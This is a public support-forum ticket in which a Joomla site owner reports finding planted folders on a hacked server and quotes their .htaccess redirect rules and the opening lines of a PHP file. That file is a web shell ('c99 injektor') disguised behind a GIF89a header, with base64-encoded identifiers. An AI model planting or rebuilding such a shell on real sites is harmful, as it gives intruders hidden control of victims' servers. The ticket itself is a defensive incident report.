Support

Admin Tools

#10318 Hacked by Something that got by Admin Tools Pro!

Posted in ‘Admin Tools for Joomla! 4 & 5’
This is a public ticket

Everybody will be able to see its contents. Do not include usernames, passwords or any other sensitive information.

Environment Information

Joomla! version
n/a
PHP version
n/a
Admin Tools version
n/a

Latest post by nicholas on Sunday, 20 November 2011 02:42 CST

Friday, 18 November 2011 14:21 CST

user40075
Hi Nikko!

I was hacked today.
I have found the following hacker files on the public_html root of mysite.com:
blogger.com, coke.net, img.youtube.com, and picasa.com.

They were put there today, as far as I can tell.

Acoording to Joomla, this is an identified hacker program:
http://forum.joomla.org/viewtopic.php?p=2637101

I have segregated the files into a new folder in public_html called "Quarantine."

This does not prevent picasa.com from reappearing after I get rid of it.

They all contain .htacess files similar to the following:
RewriteEngine on
RewriteCond %{HTTP_HOST} ^picasa\.com\.mysite\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.picasa\.com\.mysite\.com$
RewriteRule ^/?$ "http\:\/\/picasa\.com\.mysite\.com" [R=301,L]

Each contains a large (190kb) pl.php file that begins as follows:

GIF89a?????ΓΏΓΏΓΏ!ΓΉ????,???????D?;? /*******************************************/
/* c99 injektor v1 06.2008 */
/* Re-coded and modified By coke */
/* #[email protected] */
/*******************************************/
$sh_id = "Y29rZQ=";
$sh_ver = "- exploit";
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = "http://google.com";
$html_start = ''.
'
'.$sh_name. ' - '.getenv("HTTP_HOST").'